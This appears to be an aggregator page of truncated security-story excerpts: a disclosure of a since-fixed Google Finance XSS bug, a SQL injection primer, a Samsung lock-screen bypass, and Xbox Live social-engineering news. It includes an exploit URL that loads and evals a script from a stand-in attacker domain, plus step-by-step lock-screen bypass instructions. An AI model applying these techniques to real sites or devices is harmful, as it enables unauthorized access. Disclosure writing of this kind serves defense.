White Hackers

On July 11 2013, I reported to Google Security a XSS vulnerability I discovered in  google.com main domain, which required no user interaction. It is due to a glitch in  Google Finance , which is hosted on  google.com/finance , that allows to trick the Javascript application for plotting charts (in particular, sourcefile  /finance/f/sfe-opt.js ) to load a file hosted on an external domain and  eval()  its content as Javascript code. This exploit does not require any user interaction, it's just a matter of clicking on a URL. Steps to reproduce: Just click on this URL ( now fixed ):  https://www.google.com/finance?chdet=1214596800000&q=NASDAQ:INTC&ntsp=2&ntrssurl=https://evildomain.com/x.js . File  x.js  contains the following proof-of-concept code for demonstration purposes: alert ( document . domain ); The file has to be hosted over HTTPS. The remote Javascript is executed. How does it work? Here is th...

Put on your black hats folks, it’s time to learn some genuinely interesting things about SQL injection. Now remember – y’all play nice with the bits and pieces you’re about to read, ok? SQL injection is a particularly interesting risk for a few different reasons: It’s getting increasingly harder to write vulnerable code due to frameworks that automatically parameterise inputs – yet we still write bad code. You’re not necessarily in the clear just because you use stored procedures or a shiny ORM (you’re aware that  SQLi can still get through these , right?) – we still build vulnerable apps around these mitigations. It’s easily detected remotely by automated tools which can be orchestrated to crawl the web searching for vulnerable sites – yet we’re still putting them out there. It remains  number one on the OWASP Top 10  for a very good reason – it’s common, it’s very easy to exploit and the impact of doing so is severe. One little injection risk in one little fe...

I have discovered  another  security flaw in Samsung Android phones. It is possible to completely disable the lock screen and get access to any app - even when the phone is "securely" locked with a pattern, PIN, password, or face detection. Unlike another recently released flaw, this doesn't rely quite so heavily on ultra-precise timing. Video . Of course, if you are unable to download a screen unlocker, this security vulnerability still allows you to  dial any phone number and run any app ! HOWTO From the lock screen, hit the emergency call button. Dial a non-existent emergency services number - e.g. 0. Press the green dial icon. Dismiss the error message. Press the phone's back button. The app's screen will be briefly displayed. This is just about long enough to interact with the app. Using this, you can run and interact with any app / widget / settings menu. You can also use this to launch the dialler. From there, you can dial any phone...

Allegedly, the hackers who targeted Krebs did so because he helped to reveal the method by which they have been compromising the accounts of "Microsoft employees who work on the Xbox Live gaming platform," Krebs writes . The method apparently involves acquiring and then utilizing the employees' social security numbers along with some social engineering to obtain access to those accounts. "Attackers are targeting high-profile Microsoft employees by social engineering other companies." In a statement given to The Verge, Microsoft confirmed that "a handful of high-profile Xbox LIVE accounts held by current and former Microsoft employees" have in fact been compromised. However, Microsoft denies that it in any way collects or utilizes SSNs in conjunction with Xbox Live accounts. We are aware that a group of attackers are using several stringed social engineering techniques to compromise the accounts of a handful of high-profile Xbox LIVE accoun...